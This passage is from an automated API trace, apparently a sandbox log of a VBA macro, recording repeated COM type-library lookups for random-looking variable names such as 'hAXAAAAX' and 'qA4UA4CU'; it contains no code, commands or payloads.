ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2c22, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="hAXAAAAX") returned 9 [0068.530] ITypeComp:RemoteBind (in: This=0x665bd30, szName="hAXAAAAX", lHashVal=0x1083db, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.530] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hAXAAAAX") returned 0x1083db [0068.530] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="hAXAAAAX" | out: _Dst="hAXAAAAX") returned 0x0 [0068.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="hAXAAAAX") returned 9 [0068.530] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.530] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="hAXAAAAX", lHashVal=0x1083db, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.530] IUnknown:Release (This=0x665ba50) returned 0xb [0068.530] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.530] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="hAXAAAAX", lHashVal=0x1083db, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.530] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.530] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.530] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="hAXAAAAX", lHashVal=0x1083db, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.530] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.530] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.530] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="hAXAAAAX", lHashVal=0x1083db, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.530] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2c22, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="hAXAAAAX") returned 9 [0068.530] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="hAXAAAAX", lHashVal=0x1083db, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.530] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.530] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3ba2c22 | out: _Dst=0x67c2d40) returned 0x0 [0068.530] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_hAXAAAAX") returned 0x105b64 [0068.530] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_hAXAAAAX" | out: _Dst="_B_var_hAXAAAAX") returned 0x0 [0068.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_hAXAAAAX") returned 16 [0068.530] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.530] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_hAXAAAAX", lHashVal=0x105b64, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.530] IUnknown:Release (This=0x665ba50) returned 0xb [0068.530] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.530] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_hAXAAAAX", lHashVal=0x105b64, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.531] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.531] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.531] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_hAXAAAAX", lHashVal=0x105b64, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.531] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.531] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.531] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_hAXAAAAX", lHashVal=0x105b64, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.531] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.531] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.531] IUnknown:Release (This=0x665ba50) returned 0xb [0068.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc20ea, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_hAXAAAAX") returned 16 [0068.531] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_hAXAAAAX", lHashVal=0x105b64, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x68005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x68005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.531] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2c22 | out: _Dst=0x145020) returned 0x0 [0068.531] ITypeComp:RemoteBind (in: This=0x665ba60, szName="vAGAA11", lHashVal=0x101061, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2bfa, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="vAGAA11") returned 8 [0068.531] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="vAGAA11", lHashVal=0x101061, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2bfa, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="vAGAA11") returned 8 [0068.531] ITypeComp:RemoteBind (in: This=0x665bd30, szName="vAGAA11", lHashVal=0x101061, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.531] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vAGAA11") returned 0x101061 [0068.531] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="vAGAA11" | out: _Dst="vAGAA11") returned 0x0 [0068.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="vAGAA11") returned 8 [0068.531] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.531] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="vAGAA11", lHashVal=0x101061, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.531] IUnknown:Release (This=0x665ba50) returned 0xb [0068.531] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.531] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="vAGAA11", lHashVal=0x101061, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.532] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.532] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.532] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="vAGAA11", lHashVal=0x101061, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.532] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.532] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.532] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="vAGAA11", lHashVal=0x101061, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.532] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2bfa, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="vAGAA11") returned 8 [0068.532] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="vAGAA11", lHashVal=0x101061, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.532] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.532] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3ba2bfa | out: _Dst=0x67c2d40) returned 0x0 [0068.532] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_vAGAA11") returned 0x1013e5 [0068.532] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_vAGAA11" | out: _Dst="_B_var_vAGAA11") returned 0x0 [0068.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_vAGAA11") returned 15 [0068.532] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.532] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_vAGAA11", lHashVal=0x1013e5, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.532] IUnknown:Release (This=0x665ba50) returned 0xb [0068.532] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.532] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_vAGAA11", lHashVal=0x1013e5, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.532] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.532] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.532] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_vAGAA11", lHashVal=0x1013e5, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.532] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.532] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.532] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_vAGAA11", lHashVal=0x1013e5, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.532] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.532] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.532] IUnknown:Release (This=0x665ba50) returned 0xb [0068.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc211a, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_vAGAA11") returned 15 [0068.532] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_vAGAA11", lHashVal=0x1013e5, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x76005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x76005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.532] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba2bfa | out: _Dst=0x145020) returned 0x0 [0068.533] ITypeComp:RemoteBind (in: This=0x665ba60, szName="UADAQDA", lHashVal=0x107b07, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2c4e, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="UADAQDA") returned 8 [0068.533] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="UADAQDA", lHashVal=0x107b07, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2c4e, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="UADAQDA") returned 8 [0068.533] ITypeComp:RemoteBind (in: This=0x665bd30, szName="UADAQDA", lHashVal=0x107b07, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.533] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UADAQDA") returned 0x107b07 [0068.533] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="UADAQDA" | out: _Dst="UADAQDA") returned 0x0 [0068.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="UADAQDA") returned 8 [0068.533] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.533] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="UADAQDA", lHashVal=0x107b07, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.533] IUnknown:Release (This=0x665ba50) returned 0xb [0068.533] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.533] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="UADAQDA", lHashVal=0x107b07, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.533] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.533] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.533] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="UADAQDA", lHashVal=0x107b07, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.533] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.533] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.533] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="UADAQDA", lHashVal=0x107b07, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.533] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2c4e, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="UADAQDA") returned 8 [0068.533] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="UADAQDA", lHashVal=0x107b07, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.534] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.534] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3ba2c4e | out: _Dst=0x67c2d40) returned 0x0 [0068.534] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_UADAQDA") returned 0x106f0a [0068.534] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_UADAQDA" | out: _Dst="_B_var_UADAQDA") returned 0x0 [0068.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_UADAQDA") returned 15 [0068.534] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.534] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_UADAQDA", lHashVal=0x106f0a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.534] IUnknown:Release (This=0x665ba50) returned 0xb [0068.534] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.534] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_UADAQDA", lHashVal=0x106f0a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.534] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.534] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.534] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_UADAQDA", lHashVal=0x106f0a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.534] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.534] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.534] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_UADAQDA", lHashVal=0x106f0a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.534] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.534] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.534] IUnknown:Release (This=0x665ba50) returned 0xb [0068.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc214a, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_UADAQDA") returned 15 [0068.534] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_UADAQDA", lHashVal=0x106f0a, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x55005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x55005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0) returned 0x0 [0068.534] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba2c4e | out: _Dst=0x145020) returned 0x0 [0068.534] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qA4UA4CU", lHashVal=0x1079f9, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2c76, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="qA4UA4CU") returned 9 [0068.534] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qA4UA4CU", lHashVal=0x1079f9, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2c76, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="qA4UA4CU") returned 9 [0068.535] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qA4UA4CU", lHashVal=0x1079f9, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.535] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qA4UA4CU") returned 0x1079f9 [0068.535] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="qA4UA4CU" | out: _Dst="qA4UA4CU") returned 0x0 [0068.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="qA4UA4CU") returned 9 [0068.535] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.535] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qA4UA4CU", lHashVal=0x1079f9, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.535] IUnknown:Release (This=0x665ba50) returned 0xb [0068.535] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.535] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qA4UA4CU", lHashVal=0x1079f9, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.535] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.535] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.535] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qA4UA4CU", lHashVal=0x1079f9, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.535] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.535] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.535] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qA4UA4CU", lHashVal=0x1079f9, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.535] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2c76, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="qA4UA4CU") returned 9 [0068.535] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qA4UA4CU", lHashVal=0x1079f9, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.535] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.535] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3ba2c76 | out: _Dst=0x67c2d40) returned 0x0 [0068.535] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qA4UA4CU") returned 0x105182 [0068.535] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_qA4UA4CU" | out: _Dst="_B_var_qA4UA4CU") returned 0x0 [0068.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_qA4UA4CU") returned 16 [0068.535] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.535] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qA4UA4CU", lHashVal=0x105182, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.535] IUnknown:Release (This=0x665ba50) returned 0xb [0068.535] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.535] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qA4UA4CU", lHashVal=0x105182, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.535] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.536] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.536] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qA4UA4CU", lHashVal=0x105182, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.536] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.536] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.536] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qA4UA4CU", lHashVal=0x105182, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.536] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.536] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.536] IUnknown:Release (This=0x665ba50) returned 0xb [0068.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc217a, cbMultiByte=16, 